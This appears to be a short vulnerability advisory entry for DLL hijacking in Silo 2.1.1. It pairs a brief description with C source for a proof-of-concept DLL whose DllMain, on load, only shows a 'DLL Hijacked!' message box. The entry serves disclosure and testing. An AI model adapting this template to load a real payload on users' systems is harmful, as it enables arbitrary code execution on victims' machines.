// source: https://www.securityfocus.com/bid/44726/info
Silo is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Silo 2.1.1 is vulnerable; other versions may also be affected.#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){switch(fdwReason){
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;}return TRUE;}
int dll_mll(){
MessageBox(0,"DLL Hijacked!","DLL Message", MB_OK);}
